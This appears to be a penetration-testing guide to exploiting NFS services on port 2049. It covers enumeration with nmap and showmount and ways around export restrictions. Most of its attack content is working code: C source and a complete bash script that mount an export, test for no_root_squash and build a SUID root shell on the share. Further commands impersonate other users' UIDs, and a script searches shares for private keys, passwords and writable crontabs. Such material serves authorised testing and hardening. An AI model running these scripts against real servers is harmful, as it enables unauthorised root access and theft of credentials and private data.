NFS Service - Port 2049

Basic info

The Network File System (NFS) allows file sharing across Unix-like systems over a network. While convenient, NFS often exposes sensitive data and trust relationships due to misconfigurations or outdated security models. This guide delivers in-depth methods for discovering, analyzing, and exploiting NFS services during penetration testing engagements.

Identifying NFS Services During Network Reconnaissance

Port Scanning and Service Enumeration

NFS uses the following ports:

  • TCP/UDP 2049 – NFS Service (NFSv4 multiplexes mount, lock and data traffic over this single port)

  • TCP/UDP 111 – Portmapper (rpcbind); NFSv3 additionally registers mountd, nlockmgr and statd here on dynamically assigned ports, so a v3 server exposes more than these two

Run a detailed Nmap scan:

nmap -sV -sT -p 111,2049 --script=nfs-showmount,nfs-ls,nfs-statfs <target-ip>

The nfs-* scripts locate mountd through the portmapper, so port 111 must be reachable for them to return anything. rpcinfo -p <target-ip> lists every registered RPC program with its port and is the quickest way to confirm that mountd and nfs are actually up. Check the script output for exposed mount points and exports.


Enumerating NFS Exports

Using showmount

Check accessible NFS shares:

showmount -e <target-ip>

Example output:

Export list for 10.0.0.1:
/home           *
/var/nfs        192.168.0.0/24
  • * means the export can be mounted from any host

  • a CIDR range, hostname or wildcard (e.g. *.corp.example) limits mounting to that network or host; @name refers to a netgroup
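The classification above is easy to apply by hand to two exports, but on hosts with dozens of them a small parser saves time. The script below is an added example, not code from the original page: it reads saved showmount -e output (the sample text is constructed to match the listing above) and tags every export as world, network, wildcard, netgroup or host restricted.

```shell
#!/bin/sh
# Added example: classify the exports printed by `showmount -e` by how widely
# they can be mounted. Pure text processing, so it also works on saved output.
# Usage: showmount -e <target-ip> | classify_exports

# Print one line per export: "<path>\t<class>\t<client spec>"
classify_exports() {
    # First line is the "Export list for <host>:" header; the rest are "<path> <clients>"
    tail -n +2 | while read -r path clients; do
        [ -z "$path" ] && continue
        cls="host"
        case "$clients" in
            '*'|'(everyone)'|'') cls="world" ;;     # any host may mount
            *'*'*|*'?'*)         cls="wildcard" ;;  # hostname glob, e.g. *.corp.example
            */*)                 cls="network" ;;   # CIDR or netmask range
            @*)                  cls="netgroup" ;;  # NIS/LDAP netgroup
        esac
        printf '%s\t%s\t%s\n' "$path" "$cls" "$clients"
    done
}

# Count exports of one class in classify_exports output (usage: ... | count_class world)
count_class() { awk -F'\t' -v c="$1" '$2 == c { n++ } END { print n + 0 }'; }

# Constructed sample output, modelled on the listing above (not a real host)
SAMPLE='Export list for 10.0.0.1:
/home           *
/var/nfs        192.168.0.0/24
/srv/build      *.corp.example
/backup         @trusted'

printf '%s\n' "$SAMPLE" | classify_exports
```

Anything tagged world is mountable from the attacking host straight away; network and wildcard entries tell you which subnet or DNS name you need to pivot from.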

Bypassing IP-based Access Controls

The export list is enforced against the source IP of the RPC request (for hostname entries, against the reverse-DNS name of that IP). Blindly spoofing a source address therefore does not give you a usable mount over TCP, because the server's replies go to the spoofed host; the practical route is to pivot from a machine that is already inside the permitted range (a compromised client, a VPN or VLAN foothold) or to tunnel the mount through it. Where the export names a hostname or wildcard, control over the reverse-DNS record for your own IP is enough to match. These checks only decide who may mount: once mounted, NFSv3 with the default AUTH_SYS flavour trusts whatever UID and GID the client asserts.


Mounting NFS Shares and Privilege Analysis

Mounting an Export Locally

mkdir -p /mnt/nfs
mount -t nfs -o vers=3,nolock <target-ip>:/home /mnt/nfs

Forcing NFSv3 keeps the simple AUTH_SYS UID/GID behaviour the rest of this page relies on, and nolock avoids hanging on a server whose lock manager is unreachable. If the mount only works with vers=4, the export is addressed relative to the server's pseudo-root, so the path may differ from what showmount reported. Once mounted, check for files with improper permissions or embedded credentials.

UID/GID Mappings and Root Squashing

By default NFS applies root squashing: requests arriving as UID 0 are mapped to the anonymous user (UID 65534, shown as nobody or nfsnobody depending on the distribution). The server-side /etc/exports decides this with the no_root_squash option:

/home *(rw,sync,no_root_squash)

You normally cannot read the target's /etc/exports, so test the behaviour instead: as root on the attacking host, create a file on the mount and look at the owner with ls -ln. If it is owned by UID 0, no_root_squash is in effect and root access is preserved, which allows privilege escalation on the server. Note that root is the only account squashed: with AUTH_SYS the server trusts any other UID/GID you assert, so creating a local user with the same UID as a file's owner (useradd -u <uid> ...) is enough to read or write that user's data even when root_squash is on.


Exploiting no_root_squash for Remote Code Execution

Step-by-Step Attack

  1. Create a SUID Binary on Mounted Share

    Work directly on the mounted export as local root; with no_root_squash the file is stored owned by UID 0, which is what makes the SUID bit useful. Compile statically so the binary does not depend on the target's libc.

    echo -e '#include <stdlib.h>\n#include <unistd.h>\nint main(){setgid(0);setuid(0);system("/bin/bash -p");return 0;}' > /mnt/nfs/rootsh.c
    gcc -static /mnt/nfs/rootsh.c -o /mnt/nfs/rootsh
    chmod 4755 /mnt/nfs/rootsh
    ls -ln /mnt/nfs/rootsh
  2. Trigger Execution on Target. The write is on the server's disk as soon as the NFS call returns; nothing needs to "sync". What you need is a way to run the binary on the server: from any low-privileged foothold there, execute it at the exported path (/home/rootsh for the export above), or plant it where an existing cron job or login script will call it. If the directory is also mounted on a third client, that client's mount must not carry the nosuid option for the bit to be honoured there.

  3. Gain Shell with Root Privileges. Running the binary drops you into a root shell; confirm with id.
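The root-squash test and the SUID build above are easy to get subtly wrong (wrong NFS version, file created before the mount, chmod +s without the user bit), so here they are as one script. It is an added example, not code from the original page; it assumes you run it as root on the attacking host, that <target-ip> and /home are placeholders for the engagement, and that the server exposes the export at the same path locally. Only the probe logic is exercised offline; the mount and gcc steps run when a target is supplied.

```shell
#!/bin/bash
# Added example: probe an export for no_root_squash and, if present, build the
# SUID shell on it. Assumptions: run as root on the attacking host; GNU stat
# and gcc available; NFS_MOUNT is where we mount the export.
NFS_MOUNT=/mnt/nfs

# Mount with NFSv3 so the server sees our AUTH_SYS UID/GID unchanged.
mount_export() {                 # usage: mount_export <target-ip> <export>
    mkdir -p "$NFS_MOUNT"
    mount -t nfs -o vers=3,nolock "$1:$2" "$NFS_MOUNT"
}

# Create a file in DIR as the current user and print the UID the filesystem
# stored for it. On an NFS mount with root_squash a root-created file comes
# back as 65534; with no_root_squash it stays 0.
probe_owner() {                  # usage: probe_owner <dir>
    f="$1/.probe.$$"
    : > "$f" || return 2
    uid=$(stat -c %u "$f")
    rm -f "$f"
    echo "$uid"
}

# Interpret the probe result: no_root_squash, root_squash, or unknown when the
# probe was not run as root (only UID 0 is ever squashed).
root_squash_state() {            # usage: root_squash_state <observed-uid> <our-uid>
    if [ "$2" = "0" ] && [ "$1" = "0" ]; then echo no_root_squash
    elif [ "$2" = "0" ]; then echo root_squash
    else echo unknown; fi
}

# Write and build the SUID shell directly on the share. Static so the binary
# does not depend on the target's libc; chmod 4755 sets the SUID bit explicitly.
build_suid_shell() {             # usage: build_suid_shell <dir>
    cat > "$1/rootsh.c" <<'EOF'
#include <stdlib.h>
#include <unistd.h>
int main(void) {
    setgid(0);                                   /* take root's group as well */
    setuid(0);                                   /* real and effective uid 0 */
    execl("/bin/sh", "sh", "-p", (char *)NULL);  /* -p: never drop privileges */
    return 1;
}
EOF
    gcc -static -o "$1/rootsh" "$1/rootsh.c" && chmod 4755 "$1/rootsh"
    ls -ln "$1/rootsh"
}

# Full run only when a target and export are given: ./nfs_rootsquash.sh <target-ip> /home
if [ "$#" -ge 2 ]; then
    mount_export "$1" "$2"
    uid=$(probe_owner "$NFS_MOUNT")
    state=$(root_squash_state "$uid" "$(id -u)")
    echo "probe file owner uid=$uid -> $state"
    if [ "$state" = no_root_squash ]; then build_suid_shell "$NFS_MOUNT"; fi
fi
```

After a successful build, execute the binary from a foothold on the server at the export's own path (for the /home export, /home/rootsh). If the probe reports root_squash, fall back to UID impersonation: list the share with ls -ln, create a local user with a matching UID, and access that user's files as them.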


Enumerating and Extracting Sensitive Files

Commands to Discover Valuable Files

find /mnt/nfs -type f -name "*.conf"
find /mnt/nfs -type f -name "*.pem"
find /mnt/nfs -type f -perm -4000

Look for:

  • SSH private keys

  • Database credentials

  • Password backup files

  • Misconfigured .bashrc, .profile, or crontabs
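The find commands above only match by extension or mode bits, so a key saved as id_rsa.bak or a password in a file called settings.ini slips past them. The script below is an added example, not code from the original page: it searches a mounted export (or any directory) by content as well as by name and tags each hit with the category it belongs to. The sample tree in the usage note is constructed for demonstration.

```shell
#!/bin/sh
# Added example: hunt a mounted export for the item classes listed above.
# Usage: hunt_share /mnt/nfs        (prints "<class>:<path>" per finding)
hunt_share() {
    d="$1"
    # 1. Private keys matched by content, whatever the file is called
    grep -rlE -- '-----BEGIN (RSA |EC |DSA |OPENSSH |ENCRYPTED )?PRIVATE KEY-----' "$d" 2>/dev/null \
        | sed 's/^/key:/'
    # 2. Credential-looking assignments in configs and dotfiles
    grep -rliE -- '(password|passwd|secret|api[_-]?key)[[:space:]]*[=:]' "$d" 2>/dev/null \
        | sed 's/^/cred:/'
    # 3. SUID/SGID binaries (useful with no_root_squash, informative without it)
    find "$d" -type f \( -perm -4000 -o -perm -2000 \) 2>/dev/null | sed 's/^/suid:/'
    # 4. World-writable login scripts and crontabs: editing one gives code
    #    execution as its owner the next time it is read
    find "$d" -type f \( -name .bashrc -o -name .profile -o -name .bash_profile -o -path '*/cron*' \) \
        -perm -0002 2>/dev/null | sed 's/^/writable:/'
}

# Count findings of one class (usage: hunt_share DIR | count_findings key)
count_findings() { awk -v p="$1:" 'index($0, p) == 1 { n++ } END { print n + 0 }'; }
```

Run hunt_share against the mount point and review the key: and cred: hits first; under root_squash the grep calls run with your own UID, so files readable only by other UIDs need the useradd -u trick from the root-squash section before they show up.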

